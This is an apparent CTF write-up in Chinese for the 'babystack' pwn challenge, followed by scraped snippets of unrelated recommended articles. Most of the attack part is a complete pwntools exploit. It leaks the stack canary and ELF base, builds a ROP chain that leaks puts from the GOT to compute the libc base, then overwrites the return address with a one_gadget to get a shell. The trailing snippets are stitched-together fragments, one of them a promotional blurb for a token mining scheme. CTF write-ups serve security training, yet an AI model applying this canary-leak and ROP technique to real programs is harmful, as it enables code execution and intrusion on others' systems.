babystack

首先检查一下保护

全保护开启,我们IDA分析一下。

main函数很简单,首先第一个read明显存在漏洞,如果不是以 \n 结尾会存在栈中地址的泄漏。

payload = 'A'*0x88+'A'   #这里多加一个A是因为canary的低字节为\x00

p.sendafter("What's your name: ",payload)

p.recvuntil('A'*0x88)

canary  = u64(p.recv(8))-ord('A')

elf_base = u64(p.recv(6).ljust(8,'\x00'))-0x910

print 'canary: '+hex(canary)

print 'elf_base: '+hex(elf_base)

第一个read我们泄漏了canary和elf的基地址。接下来我们用第二read 泄漏libc地址,控制程序返回main函数

pop_rdi_ret = 0x973

main = elf_base+0x080A

payload = 'A'*0x88 + p64(canary) + 'B'*8

payload += p64(elf_base+pop_rdi_ret) +p64(elf_base+elf.got['puts'])+ p64(elf_base+elf.plt['puts'])+p64(main)

p.sendafter('to say: ',payload)

p.recvline()

puts = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))

libc_base = puts - libc.symbols['puts']

print 'libc_base: '+hex(libc_base)

接下来我们就可以ret2onegadget了。

#coding:utf-8

from pwn import *

context.log_level = 'debug'

p = process('./babystack')

elf = ELF('./babystack')

libc = ELF('./libc-2.27.so')

#--------------------leak canary elf_base---------------#

payload = 'A'*0x88+'A'

p.sendafter("What's your name: ",payload)

p.recvuntil('A'*0x88)

canary  = u64(p.recv(8))-ord('A')

elf_base = u64(p.recv(6).ljust(8,'\x00'))-0x910

print 'canary: '+hex(canary)

print 'elf_base: '+hex(elf_base)

#——----------------leak libc_base-----------------------------#

pop_rdi_ret = 0x973

main = elf_base+0x080A

payload = 'A'*0x88 + p64(canary) + 'B'*8

payload += p64(elf_base+pop_rdi_ret) +p64(elf_base+elf.got['puts'])+ p64(elf_base+elf.plt['puts'])+p64(main)

p.sendafter('to say: ',payload)

p.recvline()

puts = u64(p.recvuntil('\n',drop=True).ljust(8,'\x00'))

libc_base = puts - libc.symbols['puts']

print 'libc_base: '+hex(libc_base)

#---------------ret2 one_gadget----------------------------------#

one = [0x10a38c,0x4f322,0x4f2c5]

p.sendafter("What's your name: ",'AAAA')

payload = 'A'*0x88 + p64(canary) + 'B'*8 + p64(libc_base+one[0])

p.sendafter('to say: ',payload)

p.interactive()

baystack(ret2one_gadget)的更多相关文章

  1. Freebsd 编译内核

    # cd /usr/src/sys/i386/conf # cp GENERIC GENERIC.20060812# ee GENERIC 如果要加入ipf防火墙的话则加入options        ...

  2. snmp oid 和厂商对应关系

    <node oid="default" name="Unknown" type="workstation"/><node ...

  3. 鹏城杯_2018_treasure

    鹏城杯_2018_treasure 首先检查一下保护: IDA分析 我们先来看看settreasure()函数 申请了两个内存空间,并往sea中复制了shellcode 看看这个shellcode,不 ...

  4. 攻防世界pwn高手区——pwn1

    攻防世界 -- pwn1 攻防世界的一道pwn题,也有一段时间没有做pwn了,找了一道栈题热身,发现还是有些生疏了. 题目流程 拖入IDA中,题目流程如图所示,当v0为1时,存在栈溢出漏洞.在gdb中 ...

随机推荐

  1. NGK流动性挖矿为何会备受瞩目?

    随着越来越多资金的涌入,参与DeFi项目或挖矿的用户不难发现,使用体验不尽人意,在以太坊网络的DeFi时常需要漫长的等待确认和高昂的GAS费用,加上DeFi流动性挖矿需要相对较高的资金门槛和技术门槛, ...

  2. iOS拍照定制之AVCaptureVideoDataOutput

    问题 领导看了前面做的拍照,问了句"哪来的声音", "系统的,自带的,你看系统的拍照也有声音" "有办法能去掉吗?挺糟心的" "我 ...

  3. window.onresize绑定事件以及解绑事件

    问题描述 在Vue工程中,添加样式,部分需要做到自适应,需要添加resize事件,由于是单页面应用,如果组件初始化的时候绑定事件,在切换页面的时候不去注销事件,如果来回切换,会让resize事件执行多 ...

  4. Vue学习笔记-django-cors-headers安装解决跨域问题

    一  使用环境: windows 7 64位操作系统 二  jango-cors-headers安装解决跨域问题(后端解决方案) 跨域,指的是浏览器不能执行其他网站的脚本.它是由浏览器的同源策略造成的 ...

  5. 音视频+ffmpeg

    雷霄骅:https://me.csdn.net/leixiaohua1020 致敬! 1.[总结]视音频编解码技术零基础学习方法 https://blog.csdn.net/leixiaohua102 ...

  6. 12张图打开JMeter体系结构全局视角

    JMeter是Java技术栈工具,在软件测试领域应用非常广泛,无论是性能测试还是接口测试,技术都很成熟和稳定.它有一个突出特点:开源,适合做二次开发,以阿里为代表的Java技术栈公司都对它青睐有加.在 ...

  7. Python 元类编程实现一个简单的 ORM

    概述 什么是ORM? ORM全称"Object Relational Mapping",即对象-关系映射,就是把关系数据库的一行映射为一个对象,也就是一个类对应一个表,这样,写代码 ...

  8. 每日一题20201112(922. 按奇偶排序数组 II)

    题目链接: 922. 按奇偶排序数组 II 思路 很简单,搞懂问题的核心就行,假设现在有奇数在偶数位上,偶数在奇数位上. 那么我们要做的就是,找到分别在对方位置上的数字,然后交换他们就行. class ...

  9. Fastjson1.2.24RCE漏洞复现

    Fastjson1.2.24RCE漏洞复现 环境搭建 这里用的Vulhub靶场 cd /vulhub/fastjson/1.2.24-rce docker-compose up -d 报错 ERROR ...

  10. java将一个list转换成一个String,中间用分隔符隔开

    List sn=[123,1231,1231,231] sn.toString();//[123,1231,1231,231] sn.join(',').toString();//123,1231,1 ...